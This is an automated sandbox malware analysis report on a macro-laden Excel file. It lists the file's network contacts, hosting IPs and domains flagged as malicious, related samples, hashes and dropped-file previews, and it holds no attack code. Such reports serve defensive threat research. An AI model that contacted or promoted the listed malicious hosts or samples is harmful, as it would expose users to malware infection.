                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.ai20723BDA-9E27-4683-A323-0D0F8F1CA287.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  192.185.39.58
                                                                                                                                                  signifysystem.comUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                  192.185.32.232
                                                                                                                                                  fcventasyservicios.clUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:412137
                                                                                                                                                  Start date:12.05.2021
                                                                                                                                                  Start time:12:43:40
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 11s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:46747509_by_Libranalysis.xls
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:23
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal68.expl.evad.winXLS@5/6@2/2
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xls
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  192.185.39.5846747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                    192.185.32.23246747509_by_Libranalysis.xlsGet hashmaliciousBrowse

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      fcventasyservicios.cl46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      UNIFIEDLAYER-AS-1US46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.232.222.43
                                                                                                                                                      abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 67.20.76.71
                                                                                                                                                      Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.171.219
                                                                                                                                                      DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.169.22
                                                                                                                                                      dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.171.219
                                                                                                                                                      RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.129.32
                                                                                                                                                      Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.62.63
                                                                                                                                                      in.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.244.112
                                                                                                                                                      PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.144.13.239
                                                                                                                                                      catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 108.167.180.164
                                                                                                                                                      catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 108.167.180.164
                                                                                                                                                      export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 108.179.232.90
                                                                                                                                                      XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.190.216
                                                                                                                                                      QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 108.179.232.90
                                                                                                                                                      15j1TCnOiA.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.115.105
                                                                                                                                                      e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.190.216
                                                                                                                                                      SOA PDF.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.226.148
                                                                                                                                                      djBLaxEojp.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.161.67
                                                                                                                                                      quotation 35420PDF.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.41.225
                                                                                                                                                      UNIFIEDLAYER-AS-1US46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.232.222.43
                                                                                                                                                      abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 67.20.76.71
                                                                                                                                                      Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.171.219
                                                                                                                                                      DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.169.22
                                                                                                                                                      dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.171.219
                                                                                                                                                      RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.129.32
                                                                                                                                                      Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.62.63
                                                                                                                                                      in.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.244.112
                                                                                                                                                      PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.144.13.239
                                                                                                                                                      catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 108.167.180.164
                                                                                                                                                      catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 108.167.180.164
                                                                                                                                                      export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 108.179.232.90
                                                                                                                                                      XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.190.216
                                                                                                                                                      QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 108.179.232.90
                                                                                                                                                      15j1TCnOiA.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.115.105
                                                                                                                                                      e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.190.216
                                                                                                                                                      SOA PDF.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.226.148
                                                                                                                                                      djBLaxEojp.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.161.67
                                                                                                                                                      quotation 35420PDF.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.41.225

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19LMNF434.vbsGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      SF65G55121E0FE25552.vbsGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      rF27d1O1O2.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      cSvu8bTzJU.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      Contract_kyrgyzstan_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      SMC PO 1083 SAJ 1946 .exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      catalog-949138716.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      - FAX ID 74172012198198.htmGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      #Ud83d#Udd7b Missed Playback Recording.wav - 1424592794.htmGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      Cotizacii#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      Cotizaci#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      statistic-1310760242.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      Payment Slip.docxGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      Report000042.htmGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      NewPO.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58
                                                                                                                                                      755c95c8_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.32.232
                                                                                                                                                      • 192.185.39.58

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\20723BDA-9E27-4683-A323-0D0F8F1CA287
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):134558
                                                                                                                                                      Entropy (8bit):5.368383819897066
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:KcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:xEQ9DQW+zPXO8
                                                                                                                                                      MD5:EA111A76D436A6787C5E116CCE35A24E
                                                                                                                                                      SHA1:9A53062B1C1351F042A265CD4B1885F2134AD08D
                                                                                                                                                      SHA-256:0D095B6FAB5E438E1C071A400B4E1032877BB9E4A3BC8E14DC39D91A60ED5E63
                                                                                                                                                      SHA-512:79194BBA506AD112BA6231C19CD7DE1C601F1179B2500BCA10D93949CF73AD8CCFBBEAC99F6BF1D8B36E60831733467074828388476536973C4DF504229EA7C4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-12T10:44:41">.. Build: 16.0.14108.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\35820000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):81549
                                                                                                                                                      Entropy (8bit):7.910225817992212
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:hjYO+nffSDcn9iZtJOXAQR2KtCbuMB/yDL4kymYBO0y7zBr4ZLJjzpe:t+nHSD8YZo/Uh0ZymYQ0y7FALVg
                                                                                                                                                      MD5:EAE1376D3F3EDD7F6C73A13490CF4EC6
                                                                                                                                                      SHA1:FD1D64A504D2313BB440EA99BD0AD58A814EFAC9
                                                                                                                                                      SHA-256:56D90BE1307A90F010793C781D4600A928D0542B942C729626B746CB9660C46E
                                                                                                                                                      SHA-512:AA77CC97D2D4A49AE94B047DAEDFF167DE472236C4196EC73B7CF61A7E62F707CD4A091009E08A37E27674579B9E4AE16608295372E3DC8E617F764317A43BA6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .U.N#1..#.?.|.u;p..Q:.f.. .|.cW..x..@......ek....R....jaM....w-;oF..'..k......U..S.x.-[.......2.V.v.>..s.=X....hf...^c..s.....~q.]...9.d..f...zA.+'S.X.g.].j...h)...ON}...l.%(/.-Q7."..=@...Q.b....0d|.fp.'Mm..<.....0....B.R....RX;.........Q+..DL..RZ|a......f?I..b....).5V.....9...=J........I.._.....Q|.5....=T.bH._...k..vSQF.-....^..._.9.#....."=....>Q[...{..>T...._?....h......R..0<.....u ".I..m...E..'/7.CB....4y.......PK..........!..!.9............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\46747509_by_Libranalysis.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:26:59 2020, mtime=Wed May 12 18:44:44 2021, atime=Wed May 12 18:44:44 2021, length=177152, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2276
                                                                                                                                                      Entropy (8bit):4.725202260495254
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:8Q6FOEx5+NCFOEx1iB6pQ6FOEx5+NCFOEx1iB6:8QOFaNmFx1iKQOFaNmFx1i
                                                                                                                                                      MD5:56A33A746088857EE64001369B2EB7CB
                                                                                                                                                      SHA1:8894005049FF8E59518A20B62B9C309B830A6314
                                                                                                                                                      SHA-256:7D395641330ADF36C4966E5578D4C1D31D67E3BF707F0042EB6202F26642A6DD
                                                                                                                                                      SHA-512:40850439AE33A748E2BB7F8BF3E06807546400B40A5031BAF1311F553F7F02EE2B561E9026B2642C95E680D4CC7169B892128020D8FA5C5AE650D818C940545E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... ......#>...u.BBgG..u.BBgG...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qb{..user..B.......N...R.......S......................).e.n.g.i.n.e.e.r.....~.1.....>Qc{..Desktop.h.......N...R.......Y..............>......3..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .467475~1.XLS..j......>Q`{.R.......R....................j ,.4.6.7.4.7.5.0.9._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......e...............-.......d...........>.S......C:\Users\user\Desktop\46747509_by_Libranalysis.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.6.7.4.7.5.0.9._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...A}...`.......X.......216041...........!a..%.H.VZAj...c...1........-$..!a..%.H.VZAj...c...1........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 18:52:18 2019, mtime=Wed May 12 18:44:44 2021, atime=Wed May 12 18:44:44 2021, length=12288, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):917
                                                                                                                                                      Entropy (8bit):4.664331800538508
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8hcWyc20UuWCHo6C0fWVYllla+WMjA+N/E2ybD8GIeYIe8k44t2Y+xIBjKZm:8K5VTOxAS8HD37aB6m
                                                                                                                                                      MD5:4D729739C174EF8679E813E1228DDFD1
                                                                                                                                                      SHA1:B00242417FEDAAAED6E9A65E31022843DA50BCD4
                                                                                                                                                      SHA-256:DA3EE11A2EC18ED706AE0D5A52A366DE9895F613512A9D04FA43FBCBD5C19444
                                                                                                                                                      SHA-512:A3C73067FE3678F487F3FEE7BFEFD073F29A69D12920629ED14ACA9E4CC67B47C665A20AD1FE6C5AF5CB9DBC238CE56E4D2AE8E4A4F18835E1BE2B1D68B5F3B2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F..........h.!-.....BgG.....BgG...0...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qb{..user..B.......N...R.......S......................).e.n.g.i.n.e.e.r.....~.1......R....Desktop.h.......N...R.......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......H...............-.......G...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...A}...`.......X.......216041...........!a..%.H.VZAj...,,/..........-$..!a..%.H.VZAj...,,/..........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):136
                                                                                                                                                      Entropy (8bit):4.804869136735024
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:bDesBVomMJTSRysoUwSLMp6lQYsoUwSLMp6lmMJTSRysoUwSLMp6lv:bSsj6JLuNAYuNbJLuNf
                                                                                                                                                      MD5:08CA49F73A8D2767B6B08593EDAD71AA
                                                                                                                                                      SHA1:77D9A23E6095A8A8E1120A5DB2C55DAB61617BE8
                                                                                                                                                      SHA-256:E71D0D7A14577697D764E90EA5651495AFD074D0D3B8F2F3359D35DFE8E42CC4
                                                                                                                                                      SHA-512:70CACB2C8542E56B528CA926A239234B503E2137C5B30E6859DDFA0C64C5B4D021550AB9860A216C798BCF857C9B439A0A9BB7BF4FCB308D997669F5A322F3E0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: [folders]..Desktop.LNK=0..[xls]..46747509_by_Libranalysis.LNK=0..46747509_by_Libranalysis.LNK=0..[xls]..46747509_by_Libranalysis.LNK=0..
                                                                                                                                                      C:\Users\user\Desktop\26820000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):228873
                                                                                                                                                      Entropy (8bit):5.616537865312733
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:A7NiRdSD8YNoTU90uwfzn3bp0X7vrPlsrXvLlL7L77Niur:RRdTrTU9Z0gur
                                                                                                                                                      MD5:A586088E2F60F218C012DAB953F9021B
                                                                                                                                                      SHA1:0EDA9EBB9143D0093D68CC663C05EEA25F3929AB
                                                                                                                                                      SHA-256:A23D18961276F1C5AC47DA13011772A623B68C0F9642FEC1F27279785777B1F8
                                                                                                                                                      SHA-512:BABF1418773B5C70A53E000912E548A01011E7BF441B08A92CABE6E57EEEEA42A0387143A839472FF89B3F27C3A3242B6E6D6A738148A125E277F11F089AF96F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1................m..C.a.l.i.b.r.i.1................m..A.r.i.a.l.1................m..A.r.i.a.l.1................m..A.r.i.a.l.1................m..C.a.l.i.b.r.i.1...,...8........m..A.r.i.a.l.1.......8........m..A.r.i.a.l.1.......8........m..A.r.i.a.l.1.......<........m..A.r.i.a.l.1.......4........m..A.r.i.a.l.1.......4........m..A.r.i.a.l.1...h...8........m..C.a.m.b.r.i.a.1................m..C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...............

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                                                                                                                                      Entropy (8bit):3.258986427712615
                                                                                                                                                      TrID:
                                                                                                                                                      • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                      File name:46747509_by_Libranalysis.xls
                                                                                                                                                      File size:375808
                                                                                                                                                      MD5:46747509aca01f63274d3edfeddb787b
                                                                                                                                                      SHA1:8bcb09a42a62453b9437915442ce981896cb4de7
                                                                                                                                                      SHA256:00da3dfab496ea65873d53636db189ed7bd46f502386cb014876a75d71d6869b
                                                                                                                                                      SHA512:490f689c0b47303a7fc96756347df946a953288dec82250503d5057cb35f1173f59b6125943dec8f9590fd3e31b9528dfeea0b258f1eedaeba52358e27702c7b
                                                                                                                                                      SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbc5:vUGAt6Uqa5DPdG9uS9QLp4l+s+E8
                                                                                                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OLE
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "46747509_by_Libranalysis.xls"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:True
                                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                                      Encrypted Document:False
                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                      Summary

                                                                                                                                                      Code Page:1251
                                                                                                                                                      Author:van-van
                                                                                                                                                      Last Saved By:vi-vi
                                                                                                                                                      Create Time:2006-09-16 00:00:00
                                                                                                                                                      Last Saved Time:2021-05-12 07:24:11
                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                      Security:0

                                                                                                                                                      Document Summary

                                                                                                                                                      Document Code Page:1251
                                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                                      Contains Dirty Links:False

                                                                                                                                                      Streams

                                                                                                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.287037498961
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.290777742057
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
